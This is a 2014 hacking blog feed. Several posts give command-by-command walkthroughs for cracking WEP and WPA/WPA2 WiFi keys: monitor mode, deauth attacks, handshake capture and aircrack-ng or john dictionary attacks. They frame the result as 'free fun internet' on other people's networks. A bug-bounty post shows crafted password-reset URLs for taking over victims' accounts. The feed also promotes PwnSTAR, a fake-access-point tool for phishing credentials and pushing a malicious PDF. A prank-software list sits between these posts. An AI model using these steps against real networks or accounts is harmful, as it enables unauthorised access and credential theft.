For Advance security researchers you can follow the<a href="https://www.vulnhub.com/"> VULNHUB </a> It s grate source of learning.<br />
<br />
Another important website for learning is <b>infosecinstitute</b> that is great place for all type of learner.<br />
<a href="http://resources.infosecinstitute.com/articles/">Security Articles</a><br />
<a href="http://resources.infosecinstitute.com/ebooks/">Security ebook</a><br />
<a href="http://resources.infosecinstitute.com/labs/">Lab For practice </a><br />
<br />
Please do comment if you have more useful link and thanks have a nice day keep learning :)Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-43114332099220154682014-05-26T00:25:00.000+05:302014-05-27T00:27:13.910+05:30Cracking WPA/WPA2 Password Protected WiFi Network Hi all today we are going to discuss how we can crack wpa/wpa2 password protected wifi network and this time i am going to use a dictionary to do it on my next tutorial i will try to show you how even we can crack without dictionary .<br />
so lets talk about wpa/wpa2 protected network as in our previous tutorial(<a href="http://www.darksite.co.in/2014/05/cracking-wep-protected-wifi-network-in.html"><b>Cracking WEP easy way</b></a>) you must have seen we were able to crack wep network and utilizing the same technique you can crack any wep network so people says WEP is very weak and yes its weak so to over come that another wifi encryption is introduced which is known as Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) now WPA is said to be more advance than wep and safer how ever as i said we can still hack it how to do it follow the below tutorial step wise.<br />
<br />
At first check your back track machine is having its wifi drive ready to know more you can see our previous tutorial.<br />
type<b> ifconfig</b> on terminal on backtrack or kali. <br />
<font color=blue><h3>same procedure applied for cracking wpa2 protected wifi network</h3></font><br />
now start youe wlan0 interface on monitor mode which can be easily done with <b>airmon-ng start wlan0</b> this command <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-AP2SmShyeOw/U4I2u0Uv0zI/AAAAAAAAFyY/Ggg2EYKUTkQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-AP2SmShyeOw/U4I2u0Uv0zI/AAAAAAAAFyY/Ggg2EYKUTkQ/s520/1.png" /></a></div><br />
now to see the wifi data packets those are available around you using monitor interface (<b>mon0</b>) .simply type <b>airodump-ng mon0</b>.and it will display the packet available around you.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MRN_ALj2ymk/U4I3R1AeNkI/AAAAAAAAFyg/r9TsObkCvo4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://2.bp.blogspot.com/-MRN_ALj2ymk/U4I3R1AeNkI/AAAAAAAAFyg/r9TsObkCvo4/s520/2.png" /></a></div><br />
now as you can see here is a wpa protected network available around us known as <b>hackers</b> on <b>channel 11</b>.now lets hack the hackers .bring your mon0 inteface mon0 to channel 11 which can be easily done with <b>iwconfig mon0 channel 11</b><br />
now write the data packet into a file which we will utilize for cracking later .<br />
command is again simple old one <b>airodump-ng channel 11</b>(channel number)<b> mon0</b>(interface) <b>--write crackingwpa</b><b> --bssid </b>(device bssid)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-p_KeU-XsXUY/U4I4zUKAk2I/AAAAAAAAFys/9h8z1ZoMV2E/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=200 width=570 src="http://3.bp.blogspot.com/-p_KeU-XsXUY/U4I4zUKAk2I/AAAAAAAAFys/9h8z1ZoMV2E/s520/3.png" /></a></div><br />
now to be able to crack the wpa we need a handshake data packet which can be generated by sending out deauth packet from your interface .now you can broadcast a deauth packet or you can disconnect a specific client and get the hand shake done.<br />
so we will be broadcasting the deauth packet and then stop it in-order to get the handshake done and capture the handshake,<br />
command to do that is <b>aireplay-ng --deauth 0 -e hackers mon0</b>after sending some deauth stop and re allow to get the handshake,<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-n7nSIfdABl0/U4I5u0fqoBI/AAAAAAAAFy0/i5x9pB_OqCw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://2.bp.blogspot.com/-n7nSIfdABl0/U4I5u0fqoBI/AAAAAAAAFy0/i5x9pB_OqCw/s520/4.png" /></a></div>now as soon as you stop broadcasting the deauth packet you will get a handshake done :) which will lead to make cracking possible.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-SJMEpI3WxWI/U4I-INn3x7I/AAAAAAAAFzU/Pv6ewE9Tfuw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://1.bp.blogspot.com/-SJMEpI3WxWI/U4I-INn3x7I/AAAAAAAAFzU/Pv6ewE9Tfuw/s720/5.png" /></a></div>so finally after getting the hand shake all you have to do is use aircrack to crack the password from pasword dictionary list.<br />
now its all depends on number of password possible list for your easy shake i am giving a password list which contain 10K very possible password list.<a href="https://raw.githubusercontent.com/discourse/discourse/master/lib/common_passwords/10k-common-passwords.txt">download best 10K password </a> save this as password.lst and save indie root folder of aircrack then simple run this command <br />
<br />
aircrack-ng -w password.lst crackingwpa-01.cap<br />
and yes you will be successfully able crack the password now .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Z2MfRsfgQL0/U4I7li3fL-I/AAAAAAAAFzI/M4BaO__ePvc/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://1.bp.blogspot.com/-Z2MfRsfgQL0/U4I7li3fL-I/AAAAAAAAFzI/M4BaO__ePvc/s620/6.png" /></a></div>yuppi you can connect to that wifi now and password is 12344321 :).<br />
Now if the password contains (A-Z,a-z,0-9,*#$% symbol in other word complex enough )then you need to have strong password list .<br />
also you can do the cracking using john the ripper which might take take 1-2 day or even more but you have to be more patient there.go to terminal and type this to crack using john ripper <br />
<b>./john –stdout –incremental:all | aircrack-ng -b 00:11:22:33:44:55 -w – /root/crackingwpa-01.cap</b><br />
<br />
next time i will posting about how we can carck wpa/wap2 without using dictionary thanks keep visiting :). Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com1tag:blogger.com,1999:blog-4060165147151547772.post-63203759330187324962014-05-19T01:22:00.000+05:302014-05-19T11:30:44.340+05:30Cracking WEP Protected WIFI Network In Easy WayHi all After a long day back to another exciting post so this time we are going to learn how to crack wep protected wifi network .<br />
WEP Protected wifi network are not very strong in nature it can be easily be broken by any guy who has good idea on wifi things,so lets go directly into the tutorial it self i am not going to make you boar with old theory.<br />
<br />
first of all we need a back track machine you can easily make it live boot using pendrive,DVD after entering into the backtrack /kali terminal look for your network card status if it is up and running you can easily know by typing <b>ifconfig </b> on terminal.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hk2ygNRAcTg/U3kOOQcLDnI/AAAAAAAAFxE/pXN5vitNrOk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://4.bp.blogspot.com/-hk2ygNRAcTg/U3kOOQcLDnI/AAAAAAAAFxE/pXN5vitNrOk/s650/1.png" /></a></div>Now make you laptop device wireless n/w that is wlan0 in monitor mode (this mode enable you to see/capture the data packet that are floating on air )<br />
Command to do that is : <b>airmon-ng start wlan0</b> this will create mon0 interface for monitor mode <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vfU1Jy_QUU8/U3kOURkjuMI/AAAAAAAAFxM/zYqhhWxhI4E/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://2.bp.blogspot.com/-vfU1Jy_QUU8/U3kOURkjuMI/AAAAAAAAFxM/zYqhhWxhI4E/s520/2.png" /></a></div>now to see the data packet those are available on air using mon0 interface the command is <br />
<b>airodump-ng mon0</b> this will give you all packets those are available around you .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-6Mskw_38y40/U3kOeMx3FrI/AAAAAAAAFxU/2dP31xwZsF0/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://4.bp.blogspot.com/-6Mskw_38y40/U3kOeMx3FrI/AAAAAAAAFxU/2dP31xwZsF0/s420/3.png" /></a></div>So as we can see MGMNT is wep on channel 11 protected and we want to hack it/ break the key so lets do it.<br />
you can set you mon0 on that specific channel so to do that you can use these command <br />
<b>iwconfig mon0 channel 11</b> (this is needed as our wifi interface can do better communication over same channel )<br />
next write all the packet into a file which we will utilize for cracking <br />
<b>airodump-ng --channel</b> (channel numbe here its)<b>11</b> (interface)<b>mon0</b> <b>--write</b> name(<b>anyname</b>) <b>--bssid</b> bssid(Access point you want to hack bssid).<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-VaYjGbHCw-0/U3kOnj7FilI/AAAAAAAAFxc/dIRhf2Sl2MY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://3.bp.blogspot.com/-VaYjGbHCw-0/U3kOnj7FilI/AAAAAAAAFxc/dIRhf2Sl2MY/s420/4.png" /></a></div>After that is done you have to populate data packet from that Access point which can be done using <b>arpreplay </b><br />
command will be <b>aireplay-ng --arpreplay -e MGMNT mon0</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-mOdCQQYBBqg/U3kO-zkK7JI/AAAAAAAAFxs/Wq5D_Evw-18/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://1.bp.blogspot.com/-mOdCQQYBBqg/U3kO-zkK7JI/AAAAAAAAFxs/Wq5D_Evw-18/s420/6.png" /></a></div>now next point how do we get arp pakcet to do the replay action that can easily be done using an deauth packet or showing a fake connection (if no devices are connected to that access point)<br />
Deauth (open a new terminal type ) <b>arpreplay-ng --deauth 0 -e MGMNT mon0</b><br />
other wise you can show fake auth (if no devices are connected to access point ) <br />
<b>arpreplay-ng --fakeauth 0 -e MGMNT mon0 </b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cdSgKsJPJEs/U3kOxs4G2II/AAAAAAAAFxk/MpVWyVR_tH4/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://1.bp.blogspot.com/-cdSgKsJPJEs/U3kOxs4G2II/AAAAAAAAFxk/MpVWyVR_tH4/s420/5.png" /></a></div>once any client connect to access point MGMNT your arp replay will start showing you action by pumping numerous data packet .<br />
so finally after collecting more that 22K data packet that is enough to crack any wep encryption (coz of weak IV if you wann know technical details you can as me mail or chat) ..using <b>aircrack</b> again the command is simple <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Ter2HRbtji0/U3kPEhOS5II/AAAAAAAAFx0/MJDyspI6F8w/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://3.bp.blogspot.com/-Ter2HRbtji0/U3kPEhOS5II/AAAAAAAAFx0/MJDyspI6F8w/s420/7.png" /></a></div><b>aircrack-ng filename-01.cap</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RgYi4VhIJ3M/U3kPKaCppEI/AAAAAAAAFx8/HI9-6QS43B8/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://4.bp.blogspot.com/-RgYi4VhIJ3M/U3kPKaCppEI/AAAAAAAAFx8/HI9-6QS43B8/s620/8.png" /></a></div>that will display your cracked key which you can use later to connect to that access point and then have free fun internet :).<br />
do comments your query if you stuck any where we are happy to help you and thanksChandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-43715846211490697612014-04-15T23:25:00.000+05:302014-04-15T23:43:48.278+05:30Password Reset Vulnerability For Bug HuntersHi All after a long time i decided to post something on bug bounty as many people are getting much interested into it .<br />
so we are going to make a small discuss on how this Password Reset vulnerability may lead you to earn $$$ :) .All these methods are founded on many sites also good tricks that you can try during your bug bounty .<br />
<div class="center"><a href="http://2.bp.blogspot.com/-1nY0mmFQuV0/U01xWhcj3II/AAAAAAAAFvY/24Rske5MVTo/s1600/Bug-bounty-vulnerability-disclosure.jpg"><br />
<img height="199" src="http://2.bp.blogspot.com/-1nY0mmFQuV0/U01xWhcj3II/AAAAAAAAFvY/24Rske5MVTo/s900/Bug-bounty-vulnerability-disclosure.jpg" width="420" /><br />
</a><br />
<span>Password Reset Vulnerability For Bug Hunters</span><br />
</div>Most of the site where there is a sign-in button then there must be an option for <b>forgot password</b> as of course human can forgot password :P. <br />
<br />
as you click on forgot password button you will be asked for registered email id to which a link will be sent for password reset.<br />
here you can try the normal XSS,CSRF...etc attack so i won't be discussing that i will talk about something different .<br />
<br />
so when you submit the request (Email id + cpacha may be) then you will get a mail containing a url like click here to reset/change password.<br />
<br />
there are multiple kinda of url you may get i will discuss few of them.<br />
<br />
Case 1: Vulnerability on url with a token email id or username<br />
<br />
https://site.com/members/resetpassword/username=xyz&emailid=abc@def@pqr.com&token=xsdf.234sdfdssd323<br />
<br />
So here you can see the user name and email id are in the url itself in some case you will get username/email id both encrypted.<br />
there you can try get the encoding (mostly it will be either base 64 or md5 ).then you can try replace the email id and username with your desired email id/username (encrypted/ un-encrypted )if that work then congo!! you have your bounty on your pocket as some time server accept the dynamic created token and check for the registed email id-user name at database end and says enter new password which ended up giving you $$$ .<br />
<br />
but some time your luck not that good and design of application is strong enough to check for dynamic token with mapped user.<br />
<br />
Case 2: Vulnerability in reference <br />
<br />
https://site.com/members/resetpassword/username=xyz&emailid=abc@def@pqr.com&token=xsdf.234sdfdssd323<br />
<br />
This is quite interesting when ever you clicked on link like this and intercept the request on your browser (burpsuite or any proxy tool) you will see some thing like this <br />
<br />
GET /xyz HTTP/1.1<br />
Host: abcd.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: pl,en-us;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Referer: https://site.com/users/password/edit?reset_password_token=<b>HERE_IS_THE_VALUE_OF_RESET_PASSWORD_TOKEN</b><br />
Connection: keep-alive<br />
<br />
Then you can say report this as a security issue as an minimum information disclosure.<br />
<br />
n few cases you will find <br />
<br />
Referer: https://site.com/users/password/edit?mail=admin@abc.com&password=token&action=reset<br />
<br />
that some email id or admin or superuser name/ email id there also you can say it to security issue and get $$$ on your pocket.<br />
<br />
Case 3: Poor Encryption Breaking (Thanks To Ajay Sing Negi For sharing this)<br />
<br />
If you get a link like this<br />
<br />
https://site.com/members/setup-password/14aaef7bb41ed6e4b46d09298ec1bfc6a483623d/ <br />
<br />
After clicking on this type of link you will get into a page where email filed with attacker@gmail.com email id and the 2 blank field to change the password.<br />
<br />
Now while submitting request you can easily change the email id to victim mail id (can use proxy tool like burp suite )and change the password so if the validation is not there and if you have luck then you will end up resetting any victim password on that website and get a good bounty out of it.<br />
<br />
Case 4: Analyzing password Reset Vulnerability <br />
<br />
(again a good finding by Ajay singh negi)<br />
<br />
So what if you get a link like this.<br />
<br />
Attackers Email ID: attackeremailid@gmail.com and his password reset link:<br />
<br />
http://testsite.com/reset-password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t2102fadb4bd021805624f06ea4c8e4d38<br />
<br />
Here as you can guess there are some md5 encryption is there. on quick analyzing you can see 1st part in the password reset Url before '/' is password reset token and the second part is the md5 hash of the users email id in which the 1st 28 values (<b>74q55426l4q5u5m5c4s5l5m5n5t2</b>) are same for each users email ids and the remaining last values were different for each users email id as they were the users email id md5 hash value. So, the attacker can decrypt the email hash values easily using the online available md5 encrypters and decrypters like: http://md5decryption.com also sometimes some websites use base 64 encoding(or other encodings) which can also be easily decrypted using the online available base64 encoders and decoders like: http://ostermiller.org/calc/encode.html.<br />
<br />
<br />
Attackers Email ID: attackeremailid@gmail.com md5 hash value:<br />
102fadb4bd021805624f06ea4c8e4d38<br />
<br />
<br />
Victims Email ID: victimemailid@gmail.com md5 hash value:<br />
05ebb8fb6ec39f50d33e19cd5719084d<br />
<br />
<br />
1st 28 values which is same for each users email id hash:<br />
74q55426l4q5u5m5c4s5l5m5n5t2<br />
<br />
<br />
Crafted Url to Reset the password of the Victims Email ID(i.e account)victimemailid@gmail.com:<br />
<br />
http://testsite.com/reset-<br />
password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t205ebb8fb6ec39f50d33e19cd5719084d<br />
<br />
So in this way the attacker can Takeover on any users account.So if you find these kind of issue then you have money $$$ on your bank.<br />
<br />
So these are some common wayz of detecting Vulnerability that is typically found on password reset function.<br />
Also DO look out for click-jacking,CSRf,URL Redirection after password reset...etc IN password reset (even look out for log in / log out / automatically logged in after clicking the password recovery link also have a good impact ) to built the exploit scenario better and get more $$ Hope you like this please do leave a comment if you want some post like this which will help you in finding Bug-Bounty.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-46752368509066078132014-03-29T15:19:00.000+05:302014-03-29T15:24:09.313+05:30Computer Fake Viruses to Play Pranks On April Fool Day On Friends PcHi all in India we do play lots of pranks with our friends on 1st that is popularly known as April fool day :D.<br />
Also its Special In Odisha As people celebrate this day as <b>"<b>Utkala Divas</b>" (ଓଡ଼ିଶା ଦିବସ or Odisha Day</b>).<br />
So Here are some top application that you can play pranks on friends Pc specially i tried with girls pc they will scare the hell out of you :D.<br />
<br />
<a class="center" href="http://1.bp.blogspot.com/-yH86YJUfkaM/UzaXI_GQBFI/AAAAAAAAFus/dN3AjHPHnQ4/s320/troian-virus-worm.jpg"><br />
<img alt="Funny Virus on April fool day" height="299" src="http://1.bp.blogspot.com/-yH86YJUfkaM/UzaXI_GQBFI/AAAAAAAAFus/dN3AjHPHnQ4/s720/troian-virus-worm.jpg" width="670" /><br />
</a><br />
<br />
1. Add / Remove - Add/Remove is a cool prank that makes it appear that all of your software on your computer is being removed using the Windows Add/Remove Program feature. This is so real, that it will shock the most of the experienced user.<br />
<a href="http://www.rjlpranks.com/download.cfm?d=2">Download here </a><br />
2.2. Avoid – It makes your Windows Start button avoid any mouse clicks. Just launch this program exe and watch as your Start button jumps away from your mouse cursor whenever you try to click on it.<br />
<a href="http://www.rjlpranks.com/pranks/avoid/">Download Here</a><br />
3. Bomb – It will run the program you want to run, then after a delay for 5 second, it will display the BOMB message. This will simulate that the program you just ran is bombed.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/bomb/download.shtml">Download Bomb</a><br />
4. Click Me – It will display a button on which you can never click with your mouse.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/clickme/download.shtml">Download Click Me</a><br />
5. ClickStart – ClickStart is one of the cool Windows prank program which hides itself in the background and after every 45 seconds it will click on the start button causing the start menu to open. Users will be surprised when their start menu pops up, they will have no idea what is going on.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/clickstart/download.shtml">Download ClickStart</a><br />
6. Clippy – It is a simulated office assistant that, when ran, will hide in the background for 1 minute then popup in the lower right hand corner of the screen and say something useless.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/clippy/download.shtml">Download Clippy</a><br />
7. Copy Cursor – It replicates the current Windows mouse cursor over-and-over again on the screen. This is VERY annoying which makes it a great prank!<br />
<a href="http://www.rjlsoftware.com/software/entertainment/copycursor/download.shtml">Download Copy Cursor</a><br />
8. Crazy Num Caps Scroll – It will toggle the Num Lock, Caps Lock, or Scroll Lock keys at user defined intervals which makes the working of any user very annoying experience.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/crazy_ncs/download.shtml">Download Crazy Num Caps Scroll</a><br />
9. Create Message Pro – It allows you to configure and create stand alone .EXE files for distribution across your network or the Internet. It adds the ability to specify the message text, buttons to appear on the message, and the type of message icon that appears.<br />
<a href="http://www.rjlsoftware.com/software/utility/createmsg/download.shtml">Download Create Message Pro</a><br />
10. Cursor Fun – It will change the current mouse cursor to a user specified cursor. It allows you to choose which Windows cursor to change, what type of cursor to change it to.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/cursorfun/download.shtml">Download Cursor Fun</a><br />
11. Dirty Mouse – It is a windows prank that simulates the mouse ball is dirty. How many times have you tried to move your mouse and it does not move.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/dirty/download.shtml">Download Dirty Mouse</a><br />
12. DownHoax – This is a great prank makes it appear as though an “unwanted” file is being downloaded from the Internet. DownHoax randomly chooses a site from its internal database of “undesirables” and proceeds to simulate downloading an equally distasteful file.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/downhoax/download.shtml">Download DownHoax</a><br />
13. Email Fun – When executed, Email Fun displays a fake email screen complete with the To:, From:, Subject: and message contents. Then it immediately pretends to automatically type an email to everyone that is in your address book.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/email/download.shtml">Download Email Fun</a><br />
14. Fake Delete – Fake Delete simulates the deletion of all files/folders in the Windows directory or whichever directory is passed via the command line. Fake Delete uses the standard Windows delete dialog so it appears very realistic, and it cannot be disabled or stopped.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakedel/download.shtml">Download Fake Delete</a><br />
15. Fake Format – Fake Format mirrors the Windows “Format” functionality. Once the program is started, no matter which buttons are chosen, the program simulates formatting the specified drive.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakefmt/download.shtml">Download Fake Format</a><br />
16. Fake Shutdown – This prank program simulates what would occur when a user chooses to shut down Windows. Each screen was cautiously created to mirror the look of the actual Windows shutdown sequence.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakeshutdown/download.shtml">Download Fake Shutdown</a><br />
17. Fake Start Menu – This program will replace the existing Windows 95 Start Menu (task bar). It will respond to nothing from the user.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakestart/download.shtml">Download Fake Start Menu</a><br />
18. Flasher – Flasher is a hidden prank program that allows you to flash any image to the computer screen, almost like a subliminal message.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/flasher/download.shtml">Download Flasher</a><br />
19. Flip It – It will display a fake Windows message that appears to have flipped upside-down. Clicking on the YES button will slowly make each piece of text rotate 180 degrees until you can read it again.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/flipit/download.shtml">Download Flip It</a><br />
20. Floppy Madness – Floppy Madness is a small prank program that will try and access the floppy drive at user specified intervals. If this does not seem fun, just download it and see.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/floppy/download.shtml">Download Floppy Madness</a><br />
21. Follow Me – When you execute this program, it will automatically hide in Windows and wait for your mouse cursor to move. Once your cursor moves, it automatically moves your Start Button to the same position, horizontally, on the Windows Task Bar.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/followme/download.shtml">Download Follow Me</a><br />
22. Gas Gripe – This program will lead you through a series of price comparisons with other liquid products. With the help of a very clean interface, Gas Gripe will have you laughing in your chair as you watch the price per gallon go up with other products<br />
<a href="http://www.rjlsoftware.com/software/entertainment/gas/download.shtml">Download Gas Gripe</a><br />
23. HeadAche – A program that would instantly give you a headache, download and run to know how it produce a headache.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/headache/download.shtml">Download HeadAche</a><br />
24. Message Manager Lite – Message Manager it will allow you to setup a message dialog to be displayed upon a network login. You can specify the text to be displayed, the image, the buttons (up to 9), and when to display the message.<br />
<a href="http://www.rjlsoftware.com/software/utility/message/download.shtml">Download Massage Manager</a><br />
25. Mouse Droppings – Watch as your mouse drops little black turds all over your screen, randomly. This is a great joke to play on an unsuspecting co-worker, you can even email this prank to a friend.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/droppings/download.shtml">Download Mouse Droppings</a><br />
26. Mouse Move – Mouse Move is a a program that can run hidden to move the users mouse cursor to random positions on the screen.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/mousemove/download.shtml">Download Mouse Move</a><br />
27. MouseClicks – MouseClicks is a harmless gag program that allows you to disable the left, right or both mouse clicks every x seconds.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/mouseclicks/download.shtml">Download MouseClicks</a><br />
28. Password Prank – This program displays a fake, but very realistic, password box to the user. No matter what key the user presses, it starts typing in its own password. Once the password is entered an error message is displayed to the user telling them their password is not long enough.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/password/download.shtml">Download Password Prank</a><br />
29. Pirated Software – Pirated Software is a prank that emulates the standard software installation or setup. However, the installation walks you through the steps of installing illegal software.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/pirate/download.shtml">Download Pirated Software</a><br />
30. Popup Prank – Popup Prank is a gag software program that allows you to simulate these online popup advertisements.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/popup/download.shtml">Download Popup Prank</a><br />
31. Print Me – When you launch Print Me the standard Windows Print dialog appears, no matter which button is pressed a fake print dialog screen displays to the user.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/printme/download.shtml">Download Print Me</a><br />
32. WAV Launcher – This is a hidden program launcher. It will launch a specified program or .wav file at user defined intervals.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/launcher/download.shtml">Download WAV Launcher</a><br />
33. Random Bumper – It is a hidden software program that will play gross burp sounds randomly every minute until closed.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/burp/download.shtml">Download Random Bumper</a><br />
34. ReplaceKeys – ReplaceKeys is a fun little prank that allows you to replace many keyboard keystrokes with different keyboard keystrokes.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/replacekeys/download.shtml">Download ReplaceKeys</a><br />
35. Rotate – Rotate is a desktop manipulator that will randomly flip the desktop into all sorts of weird positions.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/rotate/download.shtml">Download Rotate</a><br />
36. Screen Screw – Screen Screw does just that, it screws with your screen. When you launch Screen Screw it will appear as though your screen has some type of problem painting its colors.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/screenscrew/download.shtml">Download Screen Screw</a><br />
37. Shakedown – Shakedown will take your current desktop and shake it violently, This will not only annoy you to death, but also give your eyes a good strain.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/shakedown/download.shtml">Download Shakedown</a><br />
38. Show – Hide Desktop – Show – Hide Desktop is another fun Windows prank from RJL Software. This prank allows you to configure how often the desktop icons will hide and then show again.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/showhide/download.shtml">Download Show – Hide Desktop</a><br />
39. The Finger – The Finger on an unsuspecting user and watch their reaction when the cursor changes to the middle finger and then back to normal again.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/finger/download.shtml">Download The Finger</a><br />
40. Time Traveler – Time Traveler is a devious little prank that changes the Windows system clock to a random time. To make matters worse, Time Traveler runs invisible in the background performing this task every 30 seconds.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/traveler/download.shtml">Download Time Traveler</a><br />
41. Vista Upgrade Prank – The Vista Upgrade Prank starts by emulating the Windows Update service screen. Clicking the install or cancel button closes the update service window and appears to initiate the Vista Upgrade Advisor.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/vista/download.shtml">Download Vista Upgrade Prank</a><br />
42. Y2K Joke – Y2K is a silly software program that spoofs all of the Y2K issues. It simulates fixing your BIOS, mouse, monitor, and even corrects your calendar problems by changing all letter Ys to letter Ks.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/y2k/download.shtml">Download Y2K Joke</a><br />
<br />
All of the above links and pranks are completely safe they don't harm/affect your system in anyways .these are purely built for fun application so enjoy have nice time ahead keep smiling Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-68056420813387273062014-03-16T14:04:00.001+05:302014-03-16T14:13:21.347+05:30PwnSTAR: Pwn_SofT_Ap_scRipt For HackingIt is basically a bash script to launch a Fake AP, configurable with a wide variety of attack options.Includes a number of index.html and server php scripts, for sniffing and phishing.Can act as multi-client captive portal using php and iptables.<br />
Launches classic exploits such as evil-PDF.An easy way to launch the "best" metasploit modules eg CVE-2013-0422 De-auth with aireplay, airdrop-ng or MDK3.<br />
<br />
PwnSTAR.tgz is a bundle containing the current version of the script + all required webpages.<br />
<a href="https://code.google.com/p/pwn-star/downloads/list">Download Here</a><br />
<b><br />
Few Top features:-</b><br />
<br />
takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server<br />
steals WPA handshakes<br />
phishes email credentials<br />
serves webpages: supplied (eg hotspot, below) or provide your own<br />
sniffing with ferret and sslstrip<br />
adds a captive portal to the frontend of the fake AP<br />
assorted exploits<br />
de-auth with MDK3, aireplay-ng or airdrop-ng<br />
Use your imagination, craft your own webpages, and have fun.<br />
<br />
Download packege contents.<br />
"hotspot_3" is a simple phishing web page, used with basic menu option 4.<br />
"portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal eg "Joe's CyberCafe". It is used for sniffing.<br />
"portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.<br />
"portal_pdf" forces the client to download a malicious pdf in order to pass through the portal.<br />
Designed for Kali-linux and BackTrack5 ,Current version for Kali is PwnSTAR_0.9.<br />
<br />
<b>Installation process:-</b><br />
<br />
It is simple to install and use. download from above link and then follow the screenshot.<br />
<a class="center" href="http://2.bp.blogspot.com/--Txk8nCOWPo/UyVh1RAT58I/AAAAAAAAFkE/cDN-RWsIELM/s100/12.png"><br />
